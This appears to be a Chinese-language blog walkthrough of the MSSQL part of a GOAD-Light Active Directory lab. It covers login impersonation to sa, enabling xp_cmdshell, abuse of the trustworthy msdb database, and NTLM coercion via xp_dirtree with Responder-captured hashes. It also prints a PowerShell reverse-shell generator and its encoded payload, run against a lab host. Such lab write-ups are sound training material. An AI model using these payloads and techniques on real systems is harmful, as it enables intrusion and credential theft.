GOAD-Light-Part6-MSSQL

GOAD-Light_schema

因为我的环境不是完整的GOAD,所以无法做ADCS漏洞实验,所以跳过来到下一个部分-MSSQL

拉取并运行:

ansible-playbook servers.yml以获得最新的 mssql 配置。

  • 这些修改包括:
    • arya.stark 以用户 dbo 身份执行,并模拟 msdb 数据库权限
    • brandon.stark 模仿 jon.snow

枚举MSSQL服务器

Impacket GetUserSPNs.py

1
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/GOAD/mssql]                                                                                                                                                                
└─$ impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople                                                                                                               
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                                    
                                                                                                                                                                                              
ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegati
on                                                                                                                                                                                            
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  --------
---                                                                                                                                                                                           
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2026-01-19 10:52:54.806231                               
                                                                                                                                                                                              
CIFS/winterfell.north.sevenkingdoms.local            jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009  2026-01-23 03:20:13.241743  constrai
ned                                                                                                                                                                                           
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009  2026-01-23 03:20:13.241743  constrai
ned                                                                                                                                                                                           
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-24 01:50:13.774423          
                                                                                                                                                                                              
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-24 01:50:13.774423

Nmap

1
nmap -p 1433 -sV -sC 192.168.56.10-22

image-20260124150406828

CrackMapExec

1
crackmapexec mssql 192.168.56.22

image-20260124150514077

我们可以尝试使用用户 samwell.tarly

1
crackmapexec mssql 192.168.56.22 -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local

image-20260124153215798

正如我们所见,我们已经获得了数据库访问权限。

连接数据库

1
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/samwell.tarly:Heartsbane@castelblack.north.sevenkingdoms.local

image-20260124160507681

help列出命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
lcd {path}                 - changes the current local directory to {path}                                                                                                                
exit                       - terminates the server process (and this session)                                                                                                             
enable_xp_cmdshell         - you know what it means                                                                                                                                       
disable_xp_cmdshell        - you know what it means                                                                                                                                       
enum_db                    - enum databases                                                                                                                                               
enum_links                 - enum linked servers                                                                                                                                          
enum_impersonate           - check logins that can be impersonated                                                                                                                        
enum_logins                - enum login users                                                                                                                                             
enum_users                 - enum current db users                                                                                                                                        
enum_owner                 - enum db owner                                                                                                                                                
exec_as_user {user}        - impersonate with execute as user                                                                                                                             
exec_as_login {login}      - impersonate with execute as login                                                                                                                            
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell                                                                                                                               
xp_dirtree {path}          - executes xp_dirtree on the path                                                                                                                              
sp_start_job {cmd}         - executes cmd using the sql server agent (blind)                                                                                                              
use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)                                                        
! {cmd}                    - executes a local shell cmd                                                                                                                                   
upload {from} {to}         - uploads file {from} to the SQLServer host {to}                                                                                                               
download {from} {to}       - downloads file from the SQLServer host {from} to {to}                                                                                                        
show_query                 - show query                                                                                                                                                   
mask_query                 - mask query  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
lcd {path} - 切换本地当前工作目录到 {path}

exit - 终止服务器进程(并结束本次会话)

enable_xp_cmdshell - 启用 xp_cmdshell(你懂的,开启系统命令执行)

disable_xp_cmdshell - 禁用 xp_cmdshell

enum_db - 枚举数据库

enum_links - 枚举链接服务器

enum_impersonate - 检查可以模拟(impersonate)的登录名

enum_logins - 枚举登录用户

enum_users - 枚举当前数据库用户

enum_owner - 枚举数据库所有者

exec_as_user {user} - 以指定用户身份执行(模拟用户)

exec_as_login {login} - 以指定登录名身份执行(模拟登录)

xp_cmdshell {cmd} - 使用 xp_cmdshell 执行系统命令 {cmd}

xp_dirtree {path} - 在路径 {path} 上执行 xp_dirtree(列出目录树)

sp_start_job {cmd} - 使用 SQL Server Agent 执行命令 {cmd}(无回显执行)

use_link {link} - 使用链接服务器(设置 use_link localhost 返回本地,或 use_link .. 返回上一步)

! {cmd} - 在本地执行 Shell 命令 {cmd}

upload {from} {to} - 将文件从本地 {from} 上传到 SQL Server 目标机 {to}

download {from} {to} - 将文件从 SQL Server 目标机 {from} 下载到本地 {to}

show_query - 显示查询语句

mask_query - 隐藏查询语句

枚举

1
enum_logins

image-20260124160947584

模拟用户

让我们列举一下冒充行为的几种可能性:

1
enum_impersonate

这将启动以下查询

1
2
3
4
5
SELECT 'LOGIN' as 'execute as','' AS 'database', 
pe.permission_name, pe.state_desc,pr.name AS 'grantee', pr2.name AS 'grantor' 
FROM sys.server_permissions pe 
JOIN sys.server_principals pr ON pe.grantee_principal_id = pr.principal_Id 
JOIN sys.server_principals pr2 ON pe.grantor_principal_id = pr2.principal_Id WHERE pe.type = 'IM'

命令列出了所有具有模拟权限的登录名

还会对每个数据库执行以下命令:

1
2
3
4
5
6
use <db>;
SELECT 'USER' as 'execute as', DB_NAME() AS 'database',
pe.permission_name,pe.state_desc, pr.name AS 'grantee', pr2.name AS 'grantor' 
FROM sys.database_permissions pe 
JOIN sys.database_principals pr ON pe.grantee_principal_id = pr.principal_Id 
JOIN sys.database_principals pr2 ON pe.grantor_principal_id = pr2.principal_Id WHERE pe.type = 'IM'

命令列出了所有具有模拟权限的用户

比较 登录名 Login 用户 User
级别 SQL Server 实例级别 数据库级别
作用 让你能登录服务器 让你能在数据库里做事情
控制什么 “我能进来吗?” “我能干什么?”
可以对应多个吗 是的,一个登录名可以对应多个数据库用户

SQL 登录名用于身份验证,SQL Server 用户用于授权。身份验证决定我们是否拥有访问服务器的权限,而授权决定我们可以在数据库中执行哪些不同的操作。登录名在 SQL Server 实例级别创建,而用户在 SQL Server 数据库级别创建。我们可以让来自不同数据库的多个用户连接到同一个服务器登录名。”

image-20260124162138732

image-20260124161250684

samwell 已经冒充用户 sa 登录了

我们可以使用xp_cmdshell模拟 sa并执行命令。

1
2
3
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami

这将启动以下命令

1
2
3
execute as login='sa';
exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'

image-20260124162753593

成功得到sa登录名

继续枚举登录名

1
enum_logins

image-20260124162950940

通过 sa 登录,我们可以看到更多信息。我们还可以看到 jon.snow 是 mssql 服务器上的系统管理员。

寻找其他模拟

1
enum_impersonate

image-20260124163130989

作为系统管理员用户(sa),我们可以看到数据库中的所有信息,其他具有模拟权限的用户也可以看到这些信息。

另一种进入方式是以 brandon.stark 的身份登录,然后execute as login以 jon.snow 的身份进行操作。

模拟用户

我们以 arya.stark 的身份建立与数据库的连接

1
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/arya.stark:Needle@castelblack.north.sevenkingdoms.local

如果我们使用 master 数据库并模拟用户 dbo,则无法获得 shell 访问权限。

image-20260124163802402

但是我们的用户也获得了对数据库 msdb 上 dbo 用户的模拟用户权限

这两个数据库的区别在于 msdb 数据库设置了 trustworthy 属性(msdb 数据库的默认值)。

image-20260124163910979

msdb 数据库有了 trustworthy 属性,我们就得到了一个shell:

image-20260124164516918

强制认证or中继

  • 也可以使用 Mssql 强制从 mssql 服务器进行 NTLM 身份验证。传入的连接将来自运行 mssql 服务器的用户。
  • 例如,如果我们使用像 Hodor 这样的任何用户,我们都可以获得 NTLM 身份验证。

hodr登录(0权限)

1
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/hodor:hodor@castelblack.north.sevenkingdoms.local

启动responder

1
python3 Responder.py -I eth1 -dv

运行 xp_dirtree 命令

1
2
3
4
5
6
7
exec master.sys.xp_dirtree '\\192.168.56.107\demontlm',1,1

exec	执行存储过程	MSSQL 的命令执行关键字
master.sys.xp_dirtree	扩展存储过程	系统自带的目录树查看功能
'\\192.168.56.107\demontlm'	UNC 路径	关键攻击向量
1,1	参数	控制显示深度和文件
xp_dirtree   xp_dirtree '目录路径', 深度, 是否显示文件   列出指定目录的所有子目录和文件。

成功建立联系

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[SMB] NTLMv1-SSP Client   : fe80::a971:cff2:d9a0:81f4                                                                                                                                         
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark                                                                                                                                                
[SMB] NTLMv1-SSP Hash     : eddard.stark::NORTH:76F2232A218D609200000000000000000000000000000000:E71DECB2B13AD49E4CC4D13643D1C6756D10C8BE485614FB:507f26dbfe27c70f                            
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Meren.local                                                                                                                       
[*] [LLMNR]  Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren                                                                                                                 
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Meren                                                                                                                             
[*] [MDNS] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren.local                                                                                                             
[*] [LLMNR]  Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren                                                                                                                 
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Meren                                                                                                                             
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Meren.local                                                                                                                       
[*] [MDNS] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren.local                                                                                                             
[SMB] NTLMv1-SSP Client   : fe80::a971:cff2:d9a0:81f4                                                                                                                                         
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark                                                                                                                                                
[SMB] NTLMv1-SSP Hash     : eddard.stark::NORTH:1B78FDDCD511427700000000000000000000000000000000:1E963DFE51AEA4DB7FFCCE1EEB95EC7CD9BD3C30785D10D4:a4b748ba366fd5b4                            
[SMB] NTLMv2-SSP Client   : 192.168.56.22                                                                                                                                                     
[SMB] NTLMv2-SSP Username : NORTH\sql_svc                                                                                                                                                     
[SMB] NTLMv2-SSP Hash     : sql_svc::NORTH:d1d76598545477a4:4043ADCCA794822E1B8F76BC68A45ACC:010100000000000000E3CED4E58CDC015CD18809F0A1E2880000000002000800480059005200540001001E00570049004
E002D00360052004D003700590034005400490050004900320004003400570049004E002D00360052004D00370059003400540049005000490032002E0048005900520054002E004C004F00430041004C000300140048005900520054002E0
04C004F00430041004C000500140048005900520054002E004C004F00430041004C000700080000E3CED4E58CDC0106000400020000000800300030000000000000000000000000300000CB56548D7557EACE26CB169770DA9E3DB75AFB9DD
077CF4418ED3D97119D599C0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00350036002E003100300037000000000000000000

这也适用于 ntlmrelayx

攻击链

1
2
3
4
5
1. 低权限用户连接 MSSQL
2. 执行 xp_dirtree 指向攻击者的 SMB 服务器
3. SQL Server 服务账户尝试认证到 SMB
4. 攻击者捕获服务账户的 NTLM 哈希
5. 中继或破解哈希获得更高权限

获得完整shell

我们已经可以在castelblack上执行命令,但是想要一个完整的shell交互命令行

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python3
import base64
import sys

if len(sys.argv) < 3:
    print('Usage: python3 %s <YOUR_IP> <PORT>' % sys.argv[0])
    print('Example: python3 %s 192.168.56.1 4444' % sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
port = sys.argv[2]

payload = f"""
$c = New-Object System.Net.Sockets.TCPClient('{ip}',{port});
$s = $c.GetStream();
[byte[]]$b = 0..65535|%{{0}};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){{
    $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
    $sb = (iex $d 2>&1 | Out-String );
    $sb = ([text.encoding]::ASCII).GetBytes($sb + 'PS> ');
    $s.Write($sb,0,$sb.Length);
    $s.Flush()
}};
$c.Close()
"""

# 转换为 UTF-16LE 然后 Base64
byte_payload = payload.encode('utf-16le')
b64_payload = base64.b64encode(byte_payload).decode()

print("\n" + "="*60)
print("PowerShell 反向 Shell 命令:")
print("="*60)
print(f"powershell -exec bypass -enc {b64_payload}")
print("="*60)
print("\n提示:先在 Kali 运行: nc -lvnp {port}")
print(f"然后将上面的命令在目标执行")
print("="*60)
1
python3 gen_ps_shell.py 192.168.56.107 4444

可以得到一段编码的shellcode

1
2
3
4
5
6
powershell -exec bypass -enc CgAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAnADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADAAN
wAnACwANAA0ADQANAApADsACgAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQ
AcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACQAZAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtA
C4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACAAJABpACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABpAGUAeAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQB
TAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAgACsAIAAnAFAAUwA+ACAAJwApADsACgAgACAAI
AAgACQAcwAuAFcAcgBpAHQAZQAoACQAcwBiACwAMAAsACQAcwBiAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAkAHMALgBGAGwAdQBzAGgAKAApAAoAfQA7AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAA==

image-20260124172352134

kali上起监听

1
nc -lvnp 4444

登入数据库,模拟sa,启用cmdshell

执行命令

1
2
3
4
5
6
7
SQL (sa  dbo@master)> xp_cmdshell "powershell -exec bypass -enc CgAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAnAD
EAOQAyAC4AMQA2ADgALgA1ADYALgAxADAANwAnACwANAA0ADQANAApADsACgAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAK
AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACQAZAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQ
BwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACAAJABpACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABpAGUAeAAgACQA
ZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAgAC
sAIAAnAFAAUwA+ACAAJwApADsACgAgACAAIAAgACQAcwAuAFcAcgBpAHQAZQAoACQAcwBiACwAMAAsACQAcwBiAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAkAHMALgBGAGwAdQBzAGgAKAApAAoAfQA7AAoAJABjAC4AQwBsAG8AcwBlACgAKQAK
AA=="

成功得到shell

image-20260124172513100

靶场
GOAD-Light-Part6-MSSQL
http://xiaowu5.cn/2026/01/24/GOAD-Light-Part6-MSSQL/
作者
5
发布于
2026年1月24日
许可协议
BY XIAOWU